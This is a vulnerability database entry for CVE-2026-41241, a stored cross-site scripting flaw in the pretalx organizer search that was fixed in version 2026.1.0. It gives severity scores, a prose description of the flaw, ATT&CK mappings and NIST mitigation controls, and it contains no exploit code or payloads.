Cyber Resilience

CVE-2026-41241

High

Published: 23 April 2026

Published
23 April 2026
Modified
28 April 2026
KEV Added
Patch
CVSS Score v3.1 8.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0017 6.2th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2026-41241 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Pretalx Pretalx. Its CVSS base score is 8.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 6.2th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-41241 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, affecting pretalx, an open-source conference planning tool. Published on 2026-04-23, the issue exists in versions prior to 2026.1.0, where the organizer search functionality in the pretalx backend renders submission titles, speaker display names, and user names or emails into the result dropdown using unsafe innerHTML string interpolation.

The vulnerability can be exploited by any registered user who controls one of the affected fields, such as their own display name, which may be looked up by an administrator. When an organizer performs a search query that matches the malicious record, the injected HTML or JavaScript executes in the organizer's browser. Attackers require low privileges (PR:L) and user interaction from the organizer (UI:R), enabling network-based exploitation (AV:N) with low complexity (AC:L) to achieve high confidentiality and integrity impacts (C:H/I:H) across changed security scopes (S:C), as scored at CVSS 8.7 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N).

The vulnerability is addressed in pretalx version 2026.1.0. Additional details on the issue and mitigation are available in the GitHub security advisory at https://github.com/pretalx/pretalx/security/advisories/GHSA-cjcx-jfp2-f7m2.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

pretalx is a conference planning tool. Prior to 2026.1.0, The organiser search in the pretalx backend rendered submission titles, speaker display names, and user names/emails into the result dropdown using innerHTML string interpolation. Any user who controls one of those…

more

fields (which includes any registered user whose display name is looked up by an administrator) could include HTML or JavaScript that would execute in an organiser's browser when the organiser's search query matched the malicious record. This vulnerability is fixed in 2026.1.0.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
Why these techniques?

XSS in web app enables exploitation of public-facing application (T1190) and arbitrary JavaScript execution in victim's browser (T1059.007).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-26907Shared CWE-79
CVE-2025-69084Shared CWE-79
CVE-2025-69048Shared CWE-79
CVE-2025-22567Shared CWE-79
CVE-2025-69324Shared CWE-79
CVE-2026-1841Shared CWE-79
CVE-2025-26588Shared CWE-79
CVE-2025-23850Shared CWE-79
CVE-2025-23643Shared CWE-79
CVE-2025-23616Shared CWE-79

Affected Assets

pretalx
pretalx
≤ 2026.1.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Directly mitigates XSS by requiring output filtering and encoding of user-controlled fields like submission titles and display names before rendering in the search dropdown via innerHTML.

prevent

Validates user inputs such as display names, speaker names, and emails to reject or sanitize malicious HTML/JavaScript prior to storage and rendering.

prevent

Ensures timely identification, reporting, and patching of the specific flaw in pretalx versions prior to 2026.1.0 that enables unsafe innerHTML interpolation.

References